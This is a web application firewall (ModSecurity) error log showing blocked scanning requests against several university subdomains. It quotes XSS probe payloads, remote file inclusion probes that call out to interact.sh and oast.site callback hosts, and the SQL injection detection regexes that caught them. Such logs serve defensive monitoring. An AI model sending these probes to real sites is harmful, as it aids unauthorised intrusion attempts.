"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-Hp4AAAAT"]
[Tue Aug 29 11:57:08.669065 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-Hp8AAAAT"]
[Tue Aug 29 11:57:08.690122 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-HqAAAAAT"]
[Tue Aug 29 11:57:08.692686 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArbWVIAAAAG"]
[Tue Aug 29 11:57:08.705991 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BQAAAAV"]
[Tue Aug 29 11:57:08.747517 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArbWVQAAAAG"]
[Tue Aug 29 11:57:08.759139 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq-HqMAAAAT"]
[Tue Aug 29 11:57:08.767696 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16pMCo-f0AAArbWVUAAAAG"]
[Tue Aug 29 11:57:08.864997 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16pMCo-f0AAAq5@eQAAAAK"]
[Tue Aug 29 11:57:08.896411 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BsAAAAV"]
[Tue Aug 29 11:57:09.719425 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16pcCo-f0AAArcTNUAAAAH"]
[Tue Aug 29 11:57:09.731452 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pcCo-f0AAArbWV8AAAAG"]
[Tue Aug 29 11:57:11.732494 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAm80VEAAAAF"]
[Tue Aug 29 11:57:11.766220 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAm80VIAAAAF"]
[Tue Aug 29 11:57:11.773510 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAq5@fkAAAAK"]
[Tue Aug 29 11:57:11.864934 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAm80VYAAAAF"]
[Tue Aug 29 11:57:11.872981 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAq5@f4AAAAK"]
[Tue Aug 29 11:57:11.931974 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAnEqZcAAAAO"]
[Tue Aug 29 11:57:11.976520 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAq5@gIAAAAK"]
[Tue Aug 29 11:57:12.168263 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/listings/"] [unique_id "ZO16qMCo-f0AAAnEqZ0AAAAO"]
[Tue Aug 29 11:57:12.168532 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@gYAAAAK"]
[Tue Aug 29 11:57:12.263044 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@goAAAAK"]
[Tue Aug 29 11:57:12.577383 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16qMCo-f0AAAnEqaIAAAAO"]
[Tue Aug 29 11:57:14.173377 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qsCo-f0AAArdQfwAAAAI"]
[Tue Aug 29 11:57:18.560206 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb07wim6cuxqxbc4.oast.site found within TX:1: cjmnijtjmimvgniikdb07wim6cuxqxbc4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAm80YMAAAAF"]
[Tue Aug 29 11:57:18.594369 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 